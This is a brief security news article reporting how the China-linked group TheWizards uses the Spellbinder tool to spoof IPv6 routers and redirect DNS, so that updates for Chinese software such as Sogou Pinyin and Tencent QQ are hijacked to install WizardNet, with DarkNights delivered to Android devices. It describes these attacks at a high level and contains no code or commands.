Chinese Hackers Use Spellbinder Lateral Movement Tool to Abuse IPv6 SLAAC for AitM Attacks

A hacking group linked to China, known as TheWizards, uses a tool called Spellbinder to invade computer networks. This tool allows them to sneak in and control the systems. It tricks devices by setting up fake network routers, allowing them to send harmful updates to Chinese software from a server they manage.

The hackers target software update processes of popular Chinese programs like Sogou Pinyin. This lets them install a harmful program called WizardNet. TheWizards group mainly attacks people and gambling businesses in countries such as Cambodia, Hong Kong, Mainland China, the Philippines, and the United Arab Emirates.

Spellbinder has been active since at least 2022. Once they access a network, the hackers distribute several files to run the harmful software. A key file, "winpcap.exe," helps them capture and respond to network traffic.

In 2024, the group used Spellbinder to change the software update for Tencent QQ. By altering DNS settings, they redirected software update requests to a harmful server, installing WizardNet on target computers.

Spellbinder is highly deceptive. It monitors DNS queries and checks if they come from a list of targeted Chinese platforms like Tencent, Baidu, and Xiaomi. If it does, Spellbinder intercepts these queries to redirect them to the hacker’s server.

TheWizards also use another tool called DarkNights, also known as DarkNimbus. This tool is made by a Chinese company, Sichuan Dianke Network Security Technology Co., Ltd. (UPSEC). While TheWizards use WizardNet for Windows PCs, they configure the server to send DarkNights to Android devices.

UPSEC seems to supply TheWizards with digital tools for their hacking operations, providing advanced software for their attacks.